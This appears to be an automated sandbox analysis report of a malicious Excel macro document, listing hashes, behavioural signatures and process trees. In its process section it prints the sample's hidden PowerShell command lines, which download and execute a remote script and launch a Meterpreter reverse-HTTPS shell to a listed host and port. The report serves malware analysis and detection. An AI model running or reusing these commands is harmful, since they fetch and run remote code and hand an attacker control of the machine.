Analysis
-
max time kernel
25s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
06-07-2024 22:19
Behavioral task
behavioral1
Sample
ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls
Resource
win10v2004-20240508-en
General
-
Target
ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls
-
Size
44KB
-
MD5
131ef16f091ff53b2a1105b1888ede58
-
SHA1
7a6e33c6db43066d29724fcaaa520af9d5153276
-
SHA256
ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22
-
SHA512
072528801c2be63b28b13156ba596336f67f5592da6e770ab709f5140a986772f4bf64eece7d9141d5e8898f1d80d148c2cbc0cfac913445d0c4d6416fdb3e07
-
SSDEEP
768:JtvoD8sGk3hbdlylKsgqopeJBWhZFGkE+cL4LxlnAZhgWeuFlmQQcQbJ9acY9ac6:oOk3hbdlylKsgqopeJBWhZFGkE+cL4LN
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2888 2732 powershell.exe 31 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2652 2076 wscript.exe 30 -
Blocklisted process makes network request 4 IoCs
flow pid Process 6 2888 powershell.exe 7 2888 powershell.exe 8 2744 powershell.exe 9 2744 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2888 powershell.exe 2744 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2076 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2888 powershell.exe 2744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2076 EXCEL.EXE 2076 EXCEL.EXE 2076 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2076 wrote to memory of 2652 2076 EXCEL.EXE 34 PID 2076 wrote to memory of 2652 2076 EXCEL.EXE 34 PID 2076 wrote to memory of 2652 2076 EXCEL.EXE 34 PID 2076 wrote to memory of 2652 2076 EXCEL.EXE 34 PID 2652 wrote to memory of 2744 2652 wscript.exe 35 PID 2652 wrote to memory of 2744 2652 wscript.exe 35 PID 2652 wrote to memory of 2744 2652 wscript.exe 35 PID 2652 wrote to memory of 2744 2652 wscript.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEKIPOBC2BPJAHR64G4B.temp
Filesize7KB
MD5c2456a30ba943903ad8a71f9dec7670e
SHA111641b4e0bc3c555445e2156623780fc463593f3
SHA256de2c2300cfaf360ac2d30c62dd8380bd406285af2434a1272c0171b8add5b67b
SHA512a645f7e614e94cd72b7b3655edb7c105eec5c1358d4c389d8901ad7c3a32ec81594c78b3a874d579f15e91305567e9b3aca0f845be0d6f33c74505d1948f44f9
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78